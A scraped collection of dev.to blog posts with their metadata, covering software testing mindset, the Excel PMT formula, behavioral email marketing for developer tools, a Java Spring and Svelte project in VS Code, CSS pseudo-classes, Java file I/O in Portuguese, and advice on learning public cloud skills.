[gcp-8]: https://cloud.google.com/kubernetes-engine/docs/concepts/container-native-load-balancing
[gcp-9]: https://cloud.google.com/iap/docs/enabling-kubernetes-howto#iap-access
[gcp-10]: https://cloud.google.com/kubernetes-engine/docs/how-to/managed-certs
[gcp-11]: https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-features#associating_frontendconfig_with_your_ingress
[demo-repo]: https://gitlab.com/Chabane87/securing-the-connectivity-between-gke-and-cloud-sql | chabane |
737,322 | Tests are ways of organizing thoughts, not just using tools | Creating tests is more about a way of thinking than just knowing how to use the tools. I have... | 0 | 2021-06-24T00:34:05 | https://dev.to/biosbug/testes-sao-formas-de-organizar-pensamentos-e-nao-apenas-usar-ferramentas-n3e | Creating tests is more about a way of thinking than just knowing how to use the tools.
I have been trying to find a way of thinking about tests, but I still don't have a logical line of reasoning that could define some way to start my tests.
The way forward has been to talk with the people whose ways of thinking I admire and learn from them how they structure their thoughts; my idea is to be able to develop reasoning similar to theirs.
I found this text, which aligns closely with some of the approaches I have heard from the people I admire and would trust with my learning.
https://lnkd.in/efpipia
....The next time you come across a horrible class begging to be changed, hold your hand and don't go deleting all the code; try to do things in a disciplined way..... | biosbug |
737,651 | Excel Formulas to Calculate the Payment for an Annuity ~ Quickly!! | Sometimes you need to calculate the payment for an annuity in Excel. This article will show you some... | 0 | 2021-06-30T10:47:03 | https://geekexcel.com/excel-formulas-to-calculate-the-payment-for-an-annuity/ | excelformula, excelformulas | ---
title: Excel Formulas to Calculate the Payment for an Annuity ~ Quickly!!
published: true
date: 2021-06-24 08:26:21 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-calculate-the-payment-for-an-annuity/
---
Sometimes you need to **calculate the payment for an annuity in Excel**. This article will show you some methods to achieve it. Let’s jump into this article!! Get an official version of **MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
*Figure: Calculate the payment for an annuity*
## Generic Formula:
- If you want to find out the payment for an annuity, you can use the below formula.
**=PMT(rate,nper,pv,fv,type)**
## Syntax Explanations:
- **PMT** – In Excel, the **PMT function** helps to return the periodic payment for a loan.
- **Rate** – It represents the interest rate.
- **Nper** – It is the total number of payment periods (months, quarters, years, etc.) in an annuity.
- **PV** – It represents the present value.
- **FV** – It specifies the future value.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Parenthesis ()** – The main purpose of this symbol is to group the elements.
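For example (the numbers here are purely illustrative): for a $10,000 loan at a 5% annual rate repaid in 10 yearly installments, with **fv** and **type** omitted (they default to 0), the formula would be:

**=PMT(5%, 10, 10000)**

It returns approximately **-1,295.05**. The result is negative because Excel treats the payment as money going out.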
## Practical Example:
Let’s consider the below example image.
- First, we will enter the input values in **Column B** and **Column C**.
- Here we need to calculate the annual payment.
*Figure: Input Ranges*
- Select any cell and apply the above-given formula.
*Figure: Enter the formula*
- Finally, press the **ENTER** key, and you will get the result as shown below.
*Figure: Result*
## Wrap-Up:
In this chapter, we have described the formulas to **calculate the payment for an annuity in Excel**. We welcome your **comments** and **questions** about this lesson.
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)**!! If you want to learn more helpful formulas, check out **[Excel Formulas](https://geekexcel.com/excel-formula/)**!!
### Read Also:
- **[Excel Formulas to Calculate the Present Value of Annuity ~ Useful Tricks!!](https://geekexcel.com/excel-formulas-to-calculate-the-present-value-of-annuity/)**
- **[Formulas for Finding Largest Value Smaller than a Specified Number!!](https://geekexcel.com/formulas-for-finding-largest-value-smaller-than-a-specified-number/)**
- **[How to find Vlookup and Return the Matching Values from Multiple Worksheets?](https://geekexcel.com/how-to-find-vlookup-and-return-the-matching-values-from-multiple-worksheets/)**
- **[Excel Formulas to Compare Future Values Vs Present Value ~ Easily!!](https://geekexcel.com/excel-formulas-to-compare-future-values-vs-present-value/)**
| excelgeek |
737,692 | Top 5 Behavioral Emails Every Developer Tool Should Use | Double your open rate by using behavioral emails. | 0 | 2021-06-24T11:02:53 | https://www.moesif.com/blog/developer-marketing/behavioral-emails/Top-Five-Behavioral-Emails-Every-Developer-Tool-Should-Have/ | tools, email | ---
title: Top 5 Behavioral Emails Every Developer Tool Should Use
published: true
description: Double your open rate by using behavioral emails.
tags: tools, email
canonical_url: https://www.moesif.com/blog/developer-marketing/behavioral-emails/Top-Five-Behavioral-Emails-Every-Developer-Tool-Should-Have/
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ap01f03x6cxtb7f5qb2k.png
---
Double your open rate by using behavioral emails.
The best way of engaging your customers is to share content that resonates. And nothing resonates more than sending targeted emails to developers based on their own actions and behaviors.
In a companion blog post, [Behavioral Email Speeds API Integration](https://www.moesif.com/blog/technical/behavioral-emails/How-To-Accelerate-API-Integration-with-Behavioral-Emails-and-Developer-Segmentation?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails), we explained how behaviorally-driven outreach to developers can speed API integration for an API product company. But what exactly are the best emails to get developers and product managers to integrate your API-first platform?
We examined thousands of emails that we sent out to our own customers and found that when we changed email focus from demographic/firmographic issues (company size & vertical, role, location, etc) to behavioral ones (developer funnel stage, endpoint issues, product utilization, rate limits, etc), we achieved a doubling in open rate, and a significant increase in API onboarding rate. By sending the right content to the right person at the right time, we’re able to improve our overall developer experience.
The top five behavioral emails that every API platform company should use are as follows:
## 1. Welcome Email Segmented by Goal
Upon signing up for your service, ask your prospective customer what they hope to achieve with your platform. For instance, in our onboarding workflow, one of our first steps is to inquire as to their goal:

In their welcome email make it clear that you listened to their key issue — explain how your product fulfils their needs. Use merge tags or personalization tokens and insert that same key issue into the Subject Line of the email and even its Header, as illustrated below.

## 2. Developer Integration Email Based on API Usage
Since API-first companies are ultimately most interested in driving integration, measure where developers are in their integration funnel and customize your email(s) accordingly to guide developers better along their journey. The best way to measure what stage they're at is to look at the number of API calls made. Trifurcating email messaging into top, middle and bottom of the integration funnel, we get:

For more details see our [companion blog post’s section on usage based emails](https://www.moesif.com/blog/technical/behavioral-emails/How-To-Accelerate-API-Integration-with-Behavioral-Emails-and-Developer-Segmentation/#3-usage-based-emails?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails).
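The trifurcation described above can be sketched as a simple thresholding function. The thresholds below are purely illustrative, not Moesif's actual ones; tune them to your own platform's data.

```python
def funnel_stage(api_calls: int) -> str:
    """Classify a developer's integration-funnel stage from API call volume."""
    if api_calls == 0:
        return "top"      # signed up but no calls yet: send getting-started content
    if api_calls < 1000:
        return "middle"   # actively integrating: send troubleshooting tips
    return "bottom"       # in production: send scaling and new-feature content


# Route example users to the matching email template
users = {"dev_a": 0, "dev_b": 250, "dev_c": 50_000}
segments = {name: funnel_stage(calls) for name, calls in users.items()}
print(segments)  # {'dev_a': 'top', 'dev_b': 'middle', 'dev_c': 'bottom'}
```

Each segment then maps to its own email template, so the same trigger pipeline serves all three stages.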
## 3. Subscription Plan Notification
Self-service API platforms need to scale economically with number of users. One of the biggest management headaches in SaaS is often dealing with subscription issues. By tracking API call volume, it’s possible to handle quotas and plan adjustments automatically:

[](https://www.moesif.com/features/user-behavioral-emails?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails)
## 4. Nuanced Error Warning
Service Level Agreements (SLAs), maintenance notifications and error warnings are usually governed by legal agreements. Not adhering to these covenants could cause anything from bad customer relations to financial penalties. By delving deep within your API platform itself, email warnings could be sent out based on nuanced API metrics:

## 5. New Features Email
Keeping customers abreast of the latest and greatest platform features can often be a sure-fire way to maintain engagement. This is especially true for those at the bottom of the integration funnel (those in production), since they’ll appreciate any new platform capabilities that might make their life easier. In fact, when we publicized our new behavioral email feature using the notification below, we saw email engagement ramp with how actively customers were using our platform.

# Increase Engagement & Drive Adoption With Behavioral Emails
Use this guide as a template for creating your own winning email campaign. We found that by employing the top 5 behavioral emails we were able to double open rate and accelerate integration…
[](https://www.moesif.com/features/user-behavioral-emails?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails)
---
This article was written for [the Moesif blog](https://www.moesif.com/blog/developer-marketing/behavioral-emails/Top-Five-Behavioral-Emails-Every-Developer-Tool-Should-Have/?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails) by Larry Ebringer, Head of Marketing @Moesif. | kayis |
737,749 | Pseudo-classes and pseudo-elements | CSS provide useful selector types that focus on specific platform state, like when the element is... | 13,217 | 2021-06-24T12:27:32 | https://dev.to/garimasharma/pseudo-classes-and-pseudo-elements-npp | css, codenewbie, beginners, html | CSS provides useful selector types that focus on specific platform states, such as when an element is hovered or active.
## Pseudo-Classes
HTML elements find themselves in various states, either because a user interacts with them or because one of their child elements is in a certain state.
For example, an HTML element could be hovered with the mouse pointer by a user or a child element could also be hovered by the user. For those situations, use the `:hover` pseudo-class.
```css
/*When the link is hovered with a mouse pointer this code is fired*/
a:hover {
color: blue;
text-decoration: underline;
}
```
> *Pseudo-classes let you apply CSS based on state changes. This means that your design can react to user input and change accordingly.*
For example, suppose you have an email signup form. You can change the border color of the field to red if it contains an invalid email address, and green when it contains a correct one.
As stated above, pseudo-classes let us apply CSS based on user input. Entering an email address (whether right or wrong) is the user's input.
**How do you do that?**
Well, we have the `:invalid` pseudo-class, one of many browser-provided **pseudo-classes**.
{% codepen https://codepen.io/garima-sharma814/pen/MWpNWqJ %}
A pseudo-class lets you apply styles based on state changes and external factors. This means that your design can react to user input such as an invalid email address.
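A minimal version of the signup-field styling described above might look like this (the colors and selector are just an example):

```css
/* Red border while the typed value is not a valid email address */
input[type="email"]:invalid {
  border-color: red;
}

/* Green border once the value passes the browser's validation */
input[type="email"]:valid {
  border-color: green;
}
```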
### Interactive States
We can apply the following pseudo-classes when a user interacts with our page.
- **:hover**
If the user points at an element with a pointing device (such as a mouse) and places it over the element, we can respond to that action with the `:hover` pseudo-class to apply a different style while the user *hovers* over it.
{% codepen https://codepen.io/garima-sharma814/pen/mdWNdZZ %}
**We can achieve this effect with little effort**
```html
<p> This is link <a href="#"> Try hovering me! </a> </p>
```
```css
/*This line is to remove the default behavior of anchor tag we want underline effect one hover */
a{
text-decoration: none;
}
/*When the user hover on a tag this code will be fired*/
a:hover{
text-decoration: underline;
color: #8e44ad;
}
```
- **:active**
This state is triggered while an element is actively being interacted with, such as during a click, before the click is released. With a pointing device like a mouse, this state lasts from when the click starts until it is released.
{% codepen https://codepen.io/garima-sharma814/pen/QWpewNd %}
**We can achieve this effect with little effort**
```html
<div>
<button class="btn">Click and hold to see the active state</button>
</div>
```
```css
.btn:active {
transform: scale(0.99);
box-shadow: none;
}
```
There are tons of pseudo-classes for us to explore. If you want to know more, go to [Pseudo-classes](https://developer.mozilla.org/en-US/docs/Web/CSS/Pseudo-classes)
## Pseudo-Elements
Pseudo-elements differ from pseudo-classes because instead of responding to the platform state, they act as if they are inserting a new element with CSS. Pseudo-elements are also syntactically different from pseudo-classes, because instead of using a single colon (:), we use a double colon (::).
>A pseudo-element is like adding or targeting an extra element without having to add more HTML.
For example, if you've got an article and you want the first letter to be a much bigger drop cap, how do you achieve that?
In CSS, you can use the `::first-letter` pseudo-element to achieve this sort of design detail.
```css
p::first-letter {
color: blue;
float: left;
font-size: 2.6em;
font-weight: bold;
line-height: 1;
}
```
{% codepen https://codepen.io/garima-sharma814/pen/yLMmyjK %}
**::before and ::after**
Both the `::before` and `::after` pseudo-elements create a child element inside an element only if you define a content property.
```css
.my-element::before {
content: "";
}
```
```css
.my-element::after{
content: "";
}
```
Use the `::before` pseudo-element to insert content at the start of an element, or the `::after` pseudo-element to insert content at the end of an element.
Pseudo-elements aren't limited to inserting content, though. We can also use them to target specific parts of an element.
The content can be any string, even an empty one, but be mindful that anything other than an empty string will likely be announced by a screen reader. We can also add an image `url()`, which will insert the image at its original dimensions, so we won't be able to resize it.
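For instance, a hypothetical decoration appended to every link could look like this (the arrow string would likely be announced by screen readers, as noted above):

```css
/* Insert a small arrow at the end of each link */
a::after {
  content: " →";
}
```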
There are tons of pseudo-elements for us to explore. If you want to know more, go to [Pseudo-Elements](https://developer.mozilla.org/en-US/docs/Web/CSS/Pseudo-elements)
Written and Edited by [me](https://twitter.com/garimavatss)❤.
<a href="https://www.buymeacoffee.com/garimasharma"><img src="https://img.buymeacoffee.com/button-api/?text=Buy me a coffee&emoji=&slug=garimasharma&button_colour=FF5F5F&font_colour=ffffff&font_family=Arial&outline_colour=000000&coffee_colour=FFDD00" /></a> | garimasharma |
737,828 | Build a Java Application in Visual Studio Code | For years, Java development has been dominated by three leading IDEs: Eclipse, IntelliJ IDEA and... | 0 | 2021-06-24T13:26:18 | https://dev.to/priyanshi_sharma/build-a-java-application-in-visual-studio-code-545p | java, programming, webdev, productivity | For years, [Java](https://www.java.com/) development has been dominated by three leading IDEs: Eclipse, IntelliJ IDEA and NetBeans. But there are other suitable options. Among the many talented multilingual code editors, Visual Studio Code has proven to be an outstanding product with exceptional Java support. VS Code also provides world-class support for other technology stacks, including front-end JavaScript frameworks, Node.js, and Python.
## [Building a Java Application in Visual Studio Code in 2021](https://www.decipherzone.com/blog-detail/building-java-application-visual-studio-code) ##
Should Visual Studio Code be your next Java IDE? This article describes using Visual Studio Code to create an enterprise [Java](https://www.decipherzone.com/blog-detail/code-analysis-tools-java) back end with Spring and connect it to a Svelte JavaScript front end.
### Set up Spring Boot ###
To follow along with this tutorial, you must have Java and Maven installed. You will also need the latest version of Visual Studio Code for your system if you do not already have it; it's easy to install.
Let's go straight to a new project. We will use Spring Initializr to create a Spring Boot web program. First, open VS Code and click the extensions icon in the top left corner. This is a great way to search for available plugins (and there are many). Type "spring initializr", and you will see the supporting extension for Java Spring Initializr. Install it as shown in Figure 1.

Once installed (it doesn't take long), you can use it from the command palette, which can be accessed with Ctrl-Shift-P (or View -> Command Palette from the main menu). When the command palette is open, enter "Spring Initializr", and you will see the newly installed command. Run it.
Now let's walk through the wizard. You can accept most of the default settings: for example, Java; Java version 12; artifact ID "demo"; group ID "com.InfoWorld"; "Jar" packaging; and the rest. When adding dependencies, add Spring Boot Web and Spring DevTools. (You can add more dependencies later by right-clicking the POM file and selecting Add Starter.) You will also choose the project's location; select an appropriate location on your local drive.
Once the new project has been created and loaded into your workspace, you can open a command-line terminal by pressing Ctrl-Shift-` or choosing Terminal -> New Terminal from the main menu.
Enter `mvn spring-boot:run` in the terminal. The first time you do this, Maven will download your new dependencies. As soon as this is done, the development server is up and running. To confirm this, open your browser and go to localhost:8080. You will see a default "not found" page, as we have not yet defined any routes, but it does confirm that the server is running.
You can quickly access the files by pressing Ctrl-Shift-P and typing "Demo" to see the DemoApplication.java file. Open it, and you will see a typical standalone spring launcher.
We are now installing a [Java](https://www.decipherzone.com/blog-detail/template-method-design-pattern) plugin that offers us many functions such as IntelliSense and context-based resource generation. Back in the extension menu, type in "Java Extension" and install the Java Extension Package. Finally, add the Spring Boot Extension Pack.
Now when you open the DemoApplication.java file, you will find that the VS code has a good run and debug commands directly in the source file.
### Import the Java project ###
At this point Visual Studio Code recognizes the Java project and asks, "This project contains Java. Do you want to import it?" Go ahead and choose Always. Once that's done, VS Code can keep the [Java](https://www.decipherzone.com/blog-detail/proxy-design-pattern-in-java) project configuration updated automatically.
Now we add a REST controller. Open the File Explorer (top left corner), right-click /src/com/InfoWorld/demo, and select New File. Name the file MyController.java. You will find that VS Code has stubbed out the class for you, as shown in Listing 1.
<strong> Listing 1. Java stub in VS Code </strong>
package com.InfoWorld.demo;
public class MyController {
}
Start by annotating the class with @RestController. Note that with the installed extensions, you get full autocomplete support.
Also note that you can trigger IntelliSense and autocomplete at any time by placing the cursor at the desired location and pressing Ctrl-Space, which shows VS Code's recommendations based on your current position. This will feel familiar if you use Eclipse; it is the same keyboard shortcut.
Type "Get..." in the new MyController class, and you will get the GetMapping autocomplete snippet; arrow down and select it. This creates a basic GET mapping that we'll be modifying, as shown in Listing 2.
### Create a Svelte front-end ###
Now we open a new terminal - you can arrange terminals side by side by choosing Terminal -> Split Terminal. Then, in the new terminal, go to a suitable directory (not part of the Java project) and use the commands in Listing 3 to create a new Svelte front-end.
<strong> Listing 3. Svelte front-end scaffolding </strong>
npx degit sveltejs/template vs-java-frontend
cd vs-java-frontend
npm install
npm run dev
Now you can go to localhost:5000 and view the Svelte homepage.
### Add the front-end to the workspace ###
Then right-click in the File Explorer under the demo project and select Add Folder to Workspace. Navigate to the Svelte client project you just created. This adds the front-end to VS Code as part of the project workspace so we can modify it.
Now add the Svelte for VS Code extension in the same way as the Java extensions above. Once the extension is installed, VS Code can handle both the Svelte front-end and the Java back-end.
### Connect the front and back ends ###
We can test front-to-back communication by opening the App.svelte file (Ctrl-P will find it) and changing its script element as shown in Listing 4.
<strong> Listing 4. Hitting the back-end </strong>
<script>
export let name;
async function loadData(){
let response = await fetch("http://localhost:8080");
name = await response.text();
}
loadData();
</script>
Listing 4 defines a function that issues a simple GET request to our endpoint and stores the response in the name variable, which is reflected in the markup.
## Java runtime configuration ##
To view and configure the [Java](https://www.decipherzone.com/blog-detail/when-use-composite-design-pattern-java) runtime information, you can open the Command Palette (Ctrl-Shift-P) and run Configure Java Runtime. You will see a screen like Figure 2.
<strong> Figure 2. Java runtime configuration </strong>

Please note that VS Code identifies the JDKs you have installed and determines which version to use for which projects. It also lets you install a newer JDK version from within the IDE.
### Debugging Java ###
Debugging [Java](https://www.decipherzone.com/blog-detail/iterator-design-pattern) in VS Code is also easy. Stop the demo program if it is running. Right-click the DemoApplication file and select Debug. Spring Boot starts in debug mode.
To set a breakpoint, open MyController and click to the left of line 14 so that a red dot appears. Now reload the localhost:5000 page. The breakpoint is hit, and you will see the screen shown in Figure 3.

Note that the debug toolbar gives you controls to continue, step into, step over, and so on.
### Running tests ###
Now open the DemoApplicationTests.java file created by Spring Initializr. Note the run-tests command shown above the test; click it. (You can also right-click the file and select Run [Java](https://www.decipherzone.com/blog-detail/mediator-design-pattern).) The tests run, and a checkmark is displayed next to the test results, as shown in Figure 4.

## Saving the workspace configuration ##
When you close VS Code, you will be prompted to save the workspace configuration, named workspace.code-workspace. Save your settings and open the project again to find all of your settings restored.
### VS Code for Java ###
The [Java](https://www.decipherzone.com/blog-detail/facade-design-pattern) experience in Visual Studio Code is comparable to a standard Java IDE once the right extensions are installed. The difference: VS Code is lighter, more responsive, and requires minimal setup effort.
This speed and simplicity, along with the ability to seamlessly work with other technology stacks - meaning you don't have to change gears or fight setup time in a new environment - makes VS Code a compelling option for [Java development](https://www.decipherzone.com/hire-developer).
Source: [Decipher](https://www.decipherzone.com/blog) | priyanshi_sharma |
737,998 | How to read and write text files with Java | In this article I present some simple use cases for reading and writing text files with... | 0 | 2021-06-24T16:50:08 | https://wldomiciano.com/como-ler-e-escrever-arquivos-de-texto-em-java/ | java, braziliandevs | In this article I present some simple use cases for reading and writing text files with Java.
## Reading
The code below shows how to return the entire contents of a text file as a `String`.
```java
import static java.nio.charset.StandardCharsets.UTF_16;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class ReadingAllContent {
public static void main(String... args) {
try {
Path path = Paths.get("text.txt");
byte[] bytes = Files.readAllBytes(path);
String content = new String(bytes, UTF_16);
System.out.println(content);
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
With Java 11 or newer, the code becomes simpler using the [`Files#readString`][readstring] method:
```java
Path path = Path.of("text.txt");
String content = Files.readString(path, UTF_16);
```
It is also possible to return all the lines of the file as a list of `String` using the [`Files#readAllLines`][readalllines] method.
```java
Path path = Paths.get("text.txt");
List<String> lines = Files.readAllLines(path, UTF_16);
lines.forEach(System.out::println);
```
The methods above load the entire contents of the file into memory at once, so they should only be used when the file is not too large.
To read larger files line by line, we can use the [`Files#lines`][lines] method, which returns a `Stream` that reads the lines as it is consumed.
```java
import static java.nio.charset.StandardCharsets.UTF_16;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.stream.Stream;
public class ReadingAsStream {
public static void main(String... args) {
Path path = Paths.get("text.txt");
try (Stream<String> stream = Files.lines(path, UTF_16)) {
stream.forEach(System.out::println);
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
The returned `Stream` needs to be closed when it is no longer needed, so in the example I used [_try-with-resources_][try], which guarantees it gets closed.
## Writing
The code below shows how to write a `String` to a file.
```java
import static java.nio.charset.StandardCharsets.UTF_16;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class WritingString {
public static void main(String... args) {
try {
Path path = Paths.get("text.txt");
String content = "abc";
byte[] bytes = content.getBytes(UTF_16);
Files.write(path, bytes);
} catch (IOException e) {
e.printStackTrace();
}
}
}
```
With Java 11 or newer, the code becomes simpler using the [`Files#writeString`][writestring] method.
```java
Path path = Path.of("text.txt");
Files.writeString(path, "abc", UTF_16);
```
The [`Files#write`][write-list] method also accepts a list of `String` as an argument.
```java
Path path = Paths.get("text.txt");
List<String> lines = Arrays.asList("a", "b", "c");
Files.write(path, lines, UTF_16);
```
In this case, each `String` in the list will be written as a new line in the file.
## Note 1: Choosing the charset
In the examples above I passed the [UTF-16][utf16] `Charset` explicitly just to show that it is possible, since it is not always necessary.
The [`Files#readString`][readstring] method, for example, could be invoked like this:
```java
Path path = Paths.get("text.txt");
String content = Files.readString(path);
```
In this case the charset used by default will be UTF-8, and the same applies to the methods shown below:
```java
Path path = Paths.get("text.txt");
String a = Files.readString(path);
List<String> b = Files.readAllLines(path);
Stream<String> c = Files.lines(path);
Files.writeString(path, "abc");
Files.write(path, Arrays.asList("a", "b", "c"));
```
In the [`String#getBytes`][getbytes] method, however, if the charset is not passed explicitly, your platform's default charset will be used. To get the default charset, you can use the method below:
```java
Charset charset = Charset.defaultCharset();
```
Finally, the [`StandardCharsets`][standardcharsets] class has constants only for the charsets that are required by every implementation of the Java platform. If you need a charset not defined in this class, you can obtain it as follows:
```java
Charset charset = Charset.forName("UTF-32");
```
If the desired charset is supported by the JVM, a `Charset` instance will be returned; otherwise an exception will be thrown.
## Note 2: Other options
The write methods `Files#writeString` and `Files#write` also accept extra options.
By default they will create a new file if it does not exist, or overwrite the contents of an existing file, but it is possible to change this behavior.
Consider the code below:
```java
import static java.nio.file.StandardOpenOption.APPEND;
import static java.nio.file.StandardOpenOption.CREATE;
import static java.nio.file.StandardOpenOption.CREATE_NEW;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
public class WritingWithOptions {
public static void main(String... args) throws IOException {
byte[] content = "abc".getBytes();
/* 1 */ Files.write(Paths.get("a.txt"), content, APPEND);
/* 2 */ Files.write(Paths.get("b.txt"), content, CREATE, APPEND);
/* 3 */ Files.write(Paths.get("c.txt"), content, CREATE_NEW);
}
}
```
**Example 1** will append `content` to an existing file and throw an exception if the file does not exist.
**Example 2** is similar to the first, but will create a new file if it does not exist instead of throwing an exception.
**Example 3** will always try to create a new file and will throw an exception if the file already exists.
There are other options available in the [`StandardOpenOption`][standardopenoption] class; check the documentation to learn more.
## Conclusion
There are other ways to read and write files in Java, and understanding the methods above is a good starting point before moving on to more complex cases.
If you find any errors or have additional information, be sure to use the comments.
[try]: https://docs.oracle.com/javase/tutorial/essential/exceptions/tryResourceClose.html
[lines]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#lines(java.nio.file.Path,java.nio.charset.Charset)
[utf16]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/charset/StandardCharsets.html#UTF_16
[standardopenoption]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/StandardOpenOption.html
[write-bytes]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#write(java.nio.file.Path,byte[],java.nio.file.OpenOption...)
[write-list]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#write(java.nio.file.Path,java.lang.Iterable,java.nio.charset.Charset,java.nio.file.OpenOption...)
[writestring]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#writeString(java.nio.file.Path,java.lang.CharSequence,java.nio.charset.Charset,java.nio.file.OpenOption...)
[readstring]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#readString(java.nio.file.Path,java.nio.charset.Charset)
[readalllines]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#readAllLines(java.nio.file.Path)
[readallbytes]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/file/Files.html#readAllBytes(java.nio.file.Path)
[getbytes]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/lang/String.html#getBytes()
[standardcharsets]: https://docs.oracle.com/en/java/javase/16/docs/api/java.base/java/nio/charset/StandardCharsets.html
| wldomiciano |
738,567 | Start Learning Cloud Skills! | A screenshot of one of my personal cloud projects. Introduction In my previous... | 0 | 2021-06-26T10:07:07 | http://www.karimarttila.fi/cloud/2021/06/24/start-learning-cloud-skills.html | cloud, aws, azure | ---
title: Start Learning Cloud Skills!
published: true
date: 2021-06-24 00:00:00 UTC
tags: cloud,aws,azure
canonical_url: http://www.karimarttila.fi/cloud/2021/06/24/start-learning-cloud-skills.html
---

_A screenshot of one of my personal cloud projects._
### Introduction
In my previous corporation an Azure guy once told me: _“It is not possible to be an expert in more than one cloud. If you want to be an expert in Azure you have to focus on Azure.”_ A few days passed and an AWS guy told me: _“If you want to be an expert in AWS you have to focus on AWS.”_
### Is It True?
Is it really true? If you want to be an expert in one cloud, do you really have to ditch the other clouds and focus solely on one? No, it isn't true. You can happily be an expert in as many clouds as you want. I have done IaC in Azure, GCP and AWS projects. There is no law that says you can't do so. I also have done certifications in all of these clouds (see [www.karimarttila.fi/about](https://www.karimarttila.fi/about/) for the status of my current cloud certs).
### The Argument
I guess those guys were just a bit troubled talking to a guy who does multi-cloud work. It is very human to try to come up with an argument to rationalize your choices. Their choice was to stick with one cloud - and one of the arguments for that choice was that _"it is not possible to be an expert in more than one cloud."_
### On the Other Hand
On the other hand those guys were right, sort of. If you focus only on one cloud and dedicate all your learning resources to study that cloud - naturally you will be a better expert in that cloud compared to studying two or three clouds.
But this argument does not fly that far. I have two academic degrees, an M.A. in Psychology and an M.Sc. in Software Engineering. It is perfectly possible to be interested in various fields and technologies and study them all. Studying for those academic degrees took me a lot more effort than studying three clouds. The thing that those dedicated cloud guys didn't get was that I work as a software architect and programmer. I don't have to remember by heart every little detail of any specific cloud. It's entirely sufficient to understand the basic concepts well, along with the most important services. Every cloud provides VPCs, subnets, firewalls, VMs, container registries, Kubernetes as a service, databases etc. If you have learned one cloud, it is easier to learn the same basic concepts and how to use them in new clouds, just like with programming languages. No one says that you cannot learn more than one programming language and therefore have to stick with Javascript (if you don't believe me, read my story [Five Languages - Five Stories](https://www.karimarttila.fi/languages/2018/11/19/five-languages-five-stories.html)).
### Why to Study Cloud Technologies?
I’m old enough to remember the era of the managed services divisions in big IT corporations. At the beginning of the project the software architect had to calculate the needed capacity for various servers since when you sent the order to the managed services division and they started to order those physical servers it took weeks to have them at your data center with all middleware and firewalls installed and configured. In my first cloud project some years ago I was just astonished when I realized that I can create a whole virtual infrastructure with VPC, subnets, firewalls, frontend servers, backend servers, databases, queues, alarms etc using infrastructure code, and without any help from some managed services division. And that I could deploy a new copy of that environment in minutes, up and running, everything configured just as defined in the infrastructure code. Ever since that insight I never looked back. I decided that I will work only in cloud projects in which I can create the cloud infrastructure as code and the applications running in that cloud infra.
Public clouds with virtual infrastructures are the new paradigm. If you are an application developer I strongly recommend you to start learning cloud technologies as well.
### Do You Have to Certify?
No, you don't. You can learn everything you need to know about public clouds without ever taking a certification exam. The reason I like to take these certification tests is that the requirements for the basic cloud certifications provide a really good list of the most important concepts and services you need to understand anyway to be a successful cloud expert in cloud projects (and I'm talking here about the "basic" developer/engineer/architect certs, not the specialty certs). And once you have learned those requirements, why not take the certification exam as well, put the cert in your LinkedIn profile, and start getting calls from headhunters.
### How to Start Learning Cloud Skills?
Everyone has his or her own learning methods. Mostly just follow your common sense and start learning the basics with whatever method suits you. There is a lot of material on the Internet. I have liked the courses on Pluralsight and Coursera a lot, along with doing the Qwiklabs or other labs related to those courses. I have also attended some traditional courses on specific topics like security on AWS.
If you know nothing of public clouds, just choose one of the “Big Three” - i.e. AWS, Azure, or GCP. It is not that important which one you choose - they are all good public clouds. Once you master the basics in that cloud it is easier to learn the basics regarding the other two clouds as well.
Your next step is to get **a cloud account** - you cannot learn cloud skills just by reading books - you absolutely need a cloud account. All Big Three clouds provide “free tier services” or a certain amount of free credits if you order a personal account (at least they used to do that when I learned the basics - nowadays I mostly use my company’s cloud accounts for my personal projects as well and let the capitalists pay my learning bills).
I worked in my previous corporation as a Cloud Mentor. One of my duties was to teach cloud skills to our developers. I always emphasized that there are three things you need to learn:
1. **Basic information regarding the cloud and its basic services** (e.g. virtual network, basic storage options, basic computing options).
2. How to use the **cloud provider’s portal** efficiently.
3. How to create **infrastructure as code**.
You can learn the basic concepts and services, and how to use the cloud provider's portal, by following various video courses, e.g. on Pluralsight or Coursera, and doing the labs on dedicated sites (like Qwiklabs) or using your personal cloud account (or do like I do: use your company's cloud account (with permission, of course) and let the capitalist pay your learning bills). But what those courses don't teach that much is how to create infrastructure as code (IaC) using e.g. Terraform or Pulumi or a cloud provider's native IaC tool like CloudFormation, ARM, or Deployment Manager. It is utterly important to learn how to create infrastructure as code, since in real projects that is how a cloud solution is built professionally (and not by clicking resources with a mouse in the cloud portal).
